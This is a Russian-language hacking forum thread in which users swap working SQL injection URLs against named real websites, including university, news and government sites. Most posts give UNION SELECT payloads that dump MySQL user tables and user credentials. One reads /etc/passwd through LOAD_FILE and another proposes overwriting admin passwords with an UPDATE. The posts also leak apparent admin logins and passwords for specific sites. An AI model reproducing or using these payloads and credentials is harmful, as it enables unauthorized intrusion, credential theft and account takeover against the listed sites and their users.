пошел значит я почитать про выборы в Питере... Code: http://www.vybor-spb.ru/area.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4+from+mysql.user/* вот как у нас хорошо готовятся)
решил слить всё что у меня накопилось =D ужос.. начнём с ЭДУ admin:tm9537!# - вход в админку справа. Ничё интересного я там не нашёл поддомен Гарварда. Находится к сожалению на другом серваке так и не нашёл как попасть в админку. Хотя искал не очень внимательно... =) хз чё там. Сервак на винде опять поддомен гарварда и опять другой сервер Превед без лимита страничка наглухо виснет и негрузится как сказал Грей пароль в SHA-1 ууух. Ну вот это пока что всё =) ещё где то была скуля в зоне GOV но я потерял =)
PHP: http://alx.ultranet.ru/joke_show.php?id=-1+union+select+1,version(),user()/* PHP: http://www.tklenta.ru/articles_txt.php?id=-1+union+select+user(),version()/*
вот от меня скуля Code: http://lib.prometey.org/?lib=forum&t=-92+union+select+1,concat(user_login,char(58),user_pass,char(58),user_mail)+FROM+user+limit+10353,1/* не плохо 10353 юзеров и все пассы в чистом виде login:bob pass:mixail26 сама админка http://lib.prometey.org/admin.php
PHP: http://www.intercar.com.ua/index.php?id=-1+union+select+1,2,version(),user(),5,6+from+users/* PHP: http://www.viking.tm/product.php?id=-1+union+select+1,2,3,4,5,6,7/* PHP: http://chugworth.com/comic.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
можно кста вот так: Code: http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/* && Code: http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12+from+mysql.user/*
http://www.vrijwilligerswerk.be/informatie/informatie.php?id=2+order+by+99 UPDATE т е можно сделать +union+update+admins+set+password='preved' http://www.soaw.org/new/sub.php?id=2+order+by+99 http://pride.uoregon.edu/section.php?id=-6+unioN+select+1,2,3,4,5,6
Code: http://www.aglob.ru/books/?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10/* Code: http://www.m-study.ru/art/?news_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
Code: http://www.wargames.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(name,0x3a,uname,0x3a,pass),8,9,10,11,12,13+from+users+limit+0,1/* было или нет, не видел..
Code: http://curious.astro.cornell.edu/question.php?number=-1+union+select+concat(user,0x3a,password),2,3,4,5,6+from+mysql.user+limit+1,1/* mysql hash
update Code: http://www.eng.wayne.edu/page.php?id=-1505+union+select+1,convert(id+using+latin1),3,4,5,6+from+users/*
мож кто разбирается в PostgreSQL: Code: http://www.nne.ru/news.php?id=1658' Довольно странная там шифровка паролей: Code: http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,TABLE_NAME,5,6+from+information_schema.tables+limit+16,1/* http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,concat(Username,0x3A,Password),5,6+from+Admin+limit+3,1/* пара слепых вроде: Code: http://www.fm.gov.lv/page.php?id=-1+union+select+1111111111111111/* http://daily.com.ua/analytics/page.php?id=32346+union+select+1,2/*
Code: http://www.ricardocabello.com/index.php?postid=-1+union+select+1,2,3,4,5,6,7,8/* Code: http://pnnonline.org/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* если кто-то додумает названия таблиц, буду благодарен) у меня фантазии не хватает уже =\
